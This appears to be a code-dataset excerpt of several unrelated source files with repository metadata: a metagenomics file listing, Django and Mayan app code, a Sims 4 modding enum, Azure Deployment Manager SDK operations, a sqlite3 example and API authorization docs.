"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/450.rna.sims.gz"
},
"900.abundance.function.gz": {
"compression": "gzip",
"description": null,
"size": 37710,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.function.gz"
},
"900.abundance.lca.gz": {
"compression": "gzip",
"description": null,
"size": 20045,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.lca.gz"
},
"900.abundance.md5.gz": {
"compression": "gzip",
"description": null,
"size": 45369,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.md5.gz"
},
"900.abundance.ontology.gz": {
"compression": "gzip",
"description": null,
"size": 43,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.ontology.gz"
},
"900.abundance.organism.gz": {
"compression": "gzip",
"description": null,
"size": 64413,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.abundance.organism.gz"
},
"900.loadDB.sims.filter.seq": {
"compression": null,
"description": null,
"size": 21824443,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.loadDB.sims.filter.seq"
},
"900.loadDB.source.stats": {
"compression": null,
"description": null,
"size": 128,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/900.loadDB.source.stats"
},
"999.done.COG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.COG.stats"
},
"999.done.KO.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.KO.stats"
},
"999.done.NOG.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.NOG.stats"
},
"999.done.Subsystems.stats": {
"compression": null,
"description": null,
"size": 1,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.Subsystems.stats"
},
"999.done.class.stats": {
"compression": null,
"description": null,
"size": 1553,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.class.stats"
},
"999.done.domain.stats": {
"compression": null,
"description": null,
"size": 50,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.domain.stats"
},
"999.done.family.stats": {
"compression": null,
"description": null,
"size": 5075,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.family.stats"
},
"999.done.genus.stats": {
"compression": null,
"description": null,
"size": 7360,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.genus.stats"
},
"999.done.order.stats": {
"compression": null,
"description": null,
"size": 2823,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.order.stats"
},
"999.done.phylum.stats": {
"compression": null,
"description": null,
"size": 638,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.phylum.stats"
},
"999.done.rarefaction.stats": {
"compression": null,
"description": null,
"size": 22820,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.rarefaction.stats"
},
"999.done.sims.stats": {
"compression": null,
"description": null,
"size": 80,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.sims.stats"
},
"999.done.species.stats": {
"compression": null,
"description": null,
"size": 21679,
"type": "txt",
"url": "http://api.metagenomics.anl.gov/analysis/data/id/mgm4459099.3/file/999.done.species.stats"
}
},
"id": "mgm4459099.3",
"provider": "metagenomics.anl.gov",
"providerId": "mgm4459099.3"
}
},
"raw": {
"mgm4459099.3.fna.gz": {
"compression": "gzip",
"format": "fasta",
"provider": "metagenomics.anl.gov",
"url": "http://api.metagenomics.anl.gov/reads/mgm4459099.3"
}
}
} | [
"[email protected]"
]
| |
890373e747027f7865371d1230e88bca75d7b9be | f0e3ba0707d8db85afa50701b739b570259236ca | /ppts/apps.py | 083527dbb919b18619df6ea1b4dbb874ebc2d59c | [
"MIT"
]
| permissive | Tubbz-alt/planningportal | bb3ff20ea3a730ccc2ca2ebef9e76198d5df8869 | ef8ed9e604c2ff7fb88836247aaa8eba0cfa235f | refs/heads/master | 2022-12-24T14:42:18.925112 | 2019-07-14T22:26:15 | 2019-07-14T22:26:15 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | from django.apps import AppConfig
class PptsConfig(AppConfig):
name = 'ppts'
| [
"[email protected]"
]
| |
cc0c3f49a86cd19e0eac92eb6d9d45901dc5447e | fb5c5d50d87a6861393d31911b9fae39bdc3cc62 | /Scripts/sims4communitylib/enums/common_funds_sources.py | b752318a7a87e9b2ab9fbcb9e237f428646c1ce1 | [
"CC-BY-4.0"
]
| permissive | ColonolNutty/Sims4CommunityLibrary | ee26126375f2f59e5567b72f6eb4fe9737a61df3 | 58e7beb30b9c818b294d35abd2436a0192cd3e82 | refs/heads/master | 2023-08-31T06:04:09.223005 | 2023-08-22T19:57:42 | 2023-08-22T19:57:42 | 205,197,959 | 183 | 38 | null | 2023-05-28T16:17:53 | 2019-08-29T15:48:35 | Python | UTF-8 | Python | false | false | 2,552 | py | """
The Sims 4 Community Library is licensed under the Creative Commons Attribution 4.0 International public license (CC BY 4.0).
https://creativecommons.org/licenses/by/4.0/
https://creativecommons.org/licenses/by/4.0/legalcode
Copyright (c) COLONOLNUTTY
"""
from typing import Dict
from sims.funds import FundsSource
from sims4communitylib.enums.enumtypes.common_int import CommonInt
class CommonFundsSource(CommonInt):
"""Sources of funds."""
HOUSEHOLD: 'CommonFundsSource' = ...
RETAIL: 'CommonFundsSource' = ...
BUSINESS: 'CommonFundsSource' = ...
STATISTIC: 'CommonFundsSource' = ...
BUCKS: 'CommonFundsSource' = ...
NO_SOURCE: 'CommonFundsSource' = ...
@staticmethod
def convert_to_vanilla(value: 'CommonFundsSource') -> FundsSource:
"""convert_to_vanilla(value)
Convert a value into the vanilla FundsSource enum.
:param value: An instance of the enum.
:type value: CommonFundsSource
:return: The specified value translated to FundsSource or HOUSEHOLD if the value could not be translated.
        :rtype: FundsSource
"""
mapping: Dict[CommonFundsSource, FundsSource] = {
CommonFundsSource.HOUSEHOLD: FundsSource.HOUSEHOLD,
CommonFundsSource.RETAIL: FundsSource.RETAIL,
CommonFundsSource.BUSINESS: FundsSource.BUSINESS,
CommonFundsSource.STATISTIC: FundsSource.STATISTIC,
CommonFundsSource.BUCKS: FundsSource.BUCKS,
CommonFundsSource.NO_SOURCE: FundsSource.NO_SOURCE,
}
return mapping.get(value, FundsSource.HOUSEHOLD)
@staticmethod
def convert_from_vanilla(value: FundsSource) -> 'CommonFundsSource':
"""convert_from_vanilla(value)
        Convert a vanilla FundsSource into a CommonFundsSource value.
:param value: An instance of the enum.
:type value: FundsSource
:return: The specified value translated to CommonFundsSource or HOUSEHOLD if the value could not be translated.
:rtype: CommonFundsSource
"""
mapping: Dict[FundsSource, CommonFundsSource] = {
FundsSource.HOUSEHOLD: CommonFundsSource.HOUSEHOLD,
FundsSource.RETAIL: CommonFundsSource.RETAIL,
FundsSource.BUSINESS: CommonFundsSource.BUSINESS,
FundsSource.STATISTIC: CommonFundsSource.STATISTIC,
FundsSource.BUCKS: CommonFundsSource.BUCKS,
FundsSource.NO_SOURCE: CommonFundsSource.NO_SOURCE,
}
return mapping.get(value, CommonFundsSource.HOUSEHOLD)
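# Illustrative usage sketch (not part of the library): the two converters above
# round-trip between the vanilla enum and this one.
#   vanilla = CommonFundsSource.convert_to_vanilla(CommonFundsSource.RETAIL)
#   assert CommonFundsSource.convert_from_vanilla(vanilla) == CommonFundsSource.RETAIL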
| [
"[email protected]"
]
| |
7fd63d245dbd1ed1b3c96be002435fe20c90baf8 | 44bbfe1c9a7f16e632cdd27c2de058033b33ea6d | /mayan/apps/authentication/links.py | dc7385bd9ff9101a3656851017b7786194679579 | [
"Apache-2.0"
]
| permissive | lxny2004/open-paperless | 34025c3e8ac7b4236b0d8fc5ca27fc11d50869bc | a8b45f8f0ee5d7a1b9afca5291c6bfaae3db8280 | refs/heads/master | 2020-04-27T04:46:25.992405 | 2019-03-06T03:30:15 | 2019-03-06T03:30:15 | 174,064,366 | 0 | 0 | NOASSERTION | 2019-03-06T03:29:20 | 2019-03-06T03:29:20 | null | UTF-8 | Python | false | false | 478 | py | from __future__ import unicode_literals
from django.utils.translation import ugettext_lazy as _
from navigation import Link
def has_usable_password(context):
    return context['request'].user.has_usable_password()  # call the method; a bound method object would always be truthy
link_logout = Link(
icon='fa fa-sign-out', text=_('Logout'), view='authentication:logout_view'
)
link_password_change = Link(
condition=has_usable_password, icon='fa fa-key', text=_('Change password'),
view='authentication:password_change_view'
)
| [
"[email protected]"
]
| |
6e6be05f168d51c04778758cfdbef7aef1c73390 | a838d4bed14d5df5314000b41f8318c4ebe0974e | /sdk/deploymentmanager/azure-mgmt-deploymentmanager/azure/mgmt/deploymentmanager/aio/operations/_rollouts_operations.py | 3e790f1835a9d269c5154a3a56505a1fc12ed757 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"LGPL-2.1-or-later"
]
| permissive | scbedd/azure-sdk-for-python | ee7cbd6a8725ddd4a6edfde5f40a2a589808daea | cc8bdfceb23e5ae9f78323edc2a4e66e348bb17a | refs/heads/master | 2023-09-01T08:38:56.188954 | 2021-06-17T22:52:28 | 2021-06-17T22:52:28 | 159,568,218 | 2 | 0 | MIT | 2019-08-11T21:16:01 | 2018-11-28T21:34:49 | Python | UTF-8 | Python | false | false | 23,787 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Generic, List, Optional, TypeVar, Union
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse, HttpRequest
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class RolloutsOperations:
"""RolloutsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.deploymentmanager.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _create_or_update_initial(
self,
resource_group_name: str,
rollout_name: str,
rollout_request: Optional["_models.RolloutRequest"] = None,
**kwargs: Any
) -> "_models.RolloutRequest":
cls = kwargs.pop('cls', None) # type: ClsType["_models.RolloutRequest"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
content_type = kwargs.pop("content_type", "application/json")
accept = "application/json"
# Construct URL
url = self._create_or_update_initial.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Content-Type'] = self._serialize.header("content_type", content_type, 'str')
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
body_content_kwargs = {} # type: Dict[str, Any]
if rollout_request is not None:
body_content = self._serialize.body(rollout_request, 'RolloutRequest')
else:
body_content = None
body_content_kwargs['content'] = body_content
request = self._client.put(url, query_parameters, header_parameters, **body_content_kwargs)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
response_headers = {}
response_headers['Azure-AsyncOperation']=self._deserialize('str', response.headers.get('Azure-AsyncOperation'))
deserialized = self._deserialize('RolloutRequest', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}'} # type: ignore
async def begin_create_or_update(
self,
resource_group_name: str,
rollout_name: str,
rollout_request: Optional["_models.RolloutRequest"] = None,
**kwargs: Any
) -> AsyncLROPoller["_models.RolloutRequest"]:
"""Creates or updates a rollout.
This is an asynchronous operation and can be polled to completion using the location header
returned by this operation.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:param rollout_request: Source rollout request object that defines the rollout.
:type rollout_request: ~azure.mgmt.deploymentmanager.models.RolloutRequest
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling.
Pass in False for this operation to not poll, or pass in your own initialized polling object for a personal polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either RolloutRequest or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[~azure.mgmt.deploymentmanager.models.RolloutRequest]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.RolloutRequest"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
rollout_name=rollout_name,
rollout_request=rollout_request,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
response_headers = {}
response = pipeline_response.http_response
response_headers['Azure-AsyncOperation']=self._deserialize('str', response.headers.get('Azure-AsyncOperation'))
deserialized = self._deserialize('RolloutRequest', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, response_headers)
return deserialized
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
if polling is True: polling_method = AsyncARMPolling(lro_delay, path_format_arguments=path_format_arguments, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}'} # type: ignore
async def get(
self,
resource_group_name: str,
rollout_name: str,
retry_attempt: Optional[int] = None,
**kwargs: Any
) -> "_models.Rollout":
"""Gets detailed information of a rollout.
Gets detailed information of a rollout.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:param retry_attempt: Rollout retry attempt ordinal to get the result of. If not specified,
result of the latest attempt will be returned.
:type retry_attempt: int
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Rollout, or the result of cls(response)
:rtype: ~azure.mgmt.deploymentmanager.models.Rollout
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Rollout"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
if retry_attempt is not None:
query_parameters['retryAttempt'] = self._serialize.query("retry_attempt", retry_attempt, 'int')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Rollout', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}'} # type: ignore
async def delete(
self,
resource_group_name: str,
rollout_name: str,
**kwargs: Any
) -> None:
"""Deletes a rollout resource.
Only rollouts in terminal state can be deleted.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: None, or the result of cls(response)
:rtype: None
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.delete.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.delete(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}'} # type: ignore
async def cancel(
self,
resource_group_name: str,
rollout_name: str,
**kwargs: Any
) -> "_models.Rollout":
"""Stops a running rollout.
Only running rollouts can be canceled.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Rollout, or the result of cls(response)
:rtype: ~azure.mgmt.deploymentmanager.models.Rollout
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Rollout"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.cancel.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Rollout', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
cancel.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}/cancel'} # type: ignore
async def restart(
self,
resource_group_name: str,
rollout_name: str,
skip_succeeded: Optional[bool] = None,
**kwargs: Any
) -> "_models.Rollout":
"""Restarts a failed rollout and optionally skips all succeeded steps.
Only failed rollouts can be restarted.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:param rollout_name: The rollout name.
:type rollout_name: str
:param skip_succeeded: If true, will skip all succeeded steps so far in the rollout. If false,
will execute the entire rollout again regardless of the current state of individual resources.
Defaults to false if not specified.
:type skip_succeeded: bool
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Rollout, or the result of cls(response)
:rtype: ~azure.mgmt.deploymentmanager.models.Rollout
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Rollout"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.restart.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'rolloutName': self._serialize.url("rollout_name", rollout_name, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
if skip_succeeded is not None:
query_parameters['skipSucceeded'] = self._serialize.query("skip_succeeded", skip_succeeded, 'bool')
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.post(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Rollout', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
restart.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts/{rolloutName}/restart'} # type: ignore
async def list(
self,
resource_group_name: str,
**kwargs: Any
) -> List["_models.Rollout"]:
"""Lists the rollouts in a resource group.
Lists the rollouts in a resource group.
:param resource_group_name: The name of the resource group. The name is case insensitive.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: list of Rollout, or the result of cls(response)
:rtype: list[~azure.mgmt.deploymentmanager.models.Rollout]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType[List["_models.Rollout"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2019-11-01-preview"
accept = "application/json"
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('[Rollout]', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DeploymentManager/rollouts'} # type: ignore
| [
"[email protected]"
]
| |
26f57305b55d3b30eaa55261b2928f5dc17ece1b | b8ee76250770ba628b818a26b6f894347ff2e390 | /Sqlite3Module.py | f3dd02adf33ac2df83d79a9fb702b4e8d11bbb8e | []
| no_license | SimonGideon/Journey-to-Pro | 77c77bd1a5de387c41bc8618100bbb3957d15706 | 1591310891c7699710e992fe068b8fa230ac3d56 | refs/heads/master | 2023-04-28T19:31:53.155384 | 2021-05-18T19:18:32 | 2021-05-18T19:18:32 | 358,926,411 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 699 | py | import sqlite3
conn = sqlite3.connect('Database1.db')
c = conn.cursor()
# Create a table.
c.execute('''CREATE TABLE stocks(date text, trans text, symbol text, qty real, price real)''')
# Insert a row of data (five values, one per column, into the 'stocks' table).
c.execute("INSERT INTO stocks VALUES ('2006-01-05','BUY','RHAT',100,35.14)")
conn.commit()
conn.close()
# Getting values from the db and error handling.
conn = sqlite3.connect('Database1.db')
c = conn.cursor()
try:
    # Use a parameterized query (?) instead of pasting values into the SQL string.
    c.execute("SELECT * FROM stocks WHERE trans=?", ('BUY',))
    for row in c:
        print(row)
    # To fetch one matching row; iterating above consumed the result set, so re-run the query.
    c.execute("SELECT * FROM stocks WHERE trans=?", ('BUY',))
    print(c.fetchone())
    # For multiple rows.
    c.execute("SELECT * FROM stocks WHERE trans=?", ('BUY',))
    a = c.fetchall()
    for row in a:
        print(row)
except sqlite3.Error as e:
    print("An error occurred:", e.args[0])
conn.close()
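# A minimal extra sketch (not in the original module): bulk inserts with
# executemany() and a list of parameter tuples.
purchases = [('2006-03-28', 'BUY', 'IBM', 1000, 45.0),
             ('2006-04-06', 'SELL', 'IBM', 500, 53.0)]
conn = sqlite3.connect('Database1.db')
c = conn.cursor()
c.executemany("INSERT INTO stocks VALUES (?,?,?,?,?)", purchases)
conn.commit()
conn.close()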
"[email protected]"
]
| |
9bad8400dbafa3c00fcaf4ba4085dc262f62207b | 7b3743f052da9a74808b7d2145418ce5c3e1a477 | /v2/api.thewatcher.io/api/docs/private.py | 5f68768247fe15338ab8d818e23743055fb70ded | [
"MIT"
]
| permissive | quebecsti/kdm-manager | 5547cbf8928d485c6449650dc77805877a67ee37 | a5fcda27d04135429e43a21ac655e6f6acc7768e | refs/heads/master | 2020-11-26T19:22:53.197651 | 2019-10-22T20:53:40 | 2019-10-22T20:53:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 48,331 | py | authorization_token_management = {
"authorization_check": {
"name": "/authorization/check",
"desc": """\
<p><b>GET</b> or <b>POST</b> to this endpoint to determine if your Authorization
header is still valid or if it has expired.</p>""",
},
"authorization_refresh": {
"name": "/authorization/refresh",
"desc": """\
<p> Use the standard 'Authorization' header and <b>POST</b> an empty request to
    this route to receive a new Auth token based on the previous one.</p>
<p> On the back end, this route reads the incoming 'Authorization' header and,
even if the JWT token is expired, will check the 'login' and 'password' (hash)
keys: if they check out, you get a 200 and a brand new token.</p>
<p> Finally, the KDM API does NOT use refresh tokens (it just feels like
overkill, you know?).</p>\
"""
},
}
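# Illustrative call for the token routes documented above (host inferred from
# this file's repo path; the token is a placeholder):
#   curl -X POST -H "Authorization: $JWT" https://api.thewatcher.io/authorization/refresh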
administrative_views_and_data = {
"admin_view_panel": {
"name": "/admin/view/panel",
"methods": ["GET","OPTIONS"],
"desc": """\
<p>Access the API Admin panel. Uses HTTP basic auth (no cookies/no sessions)
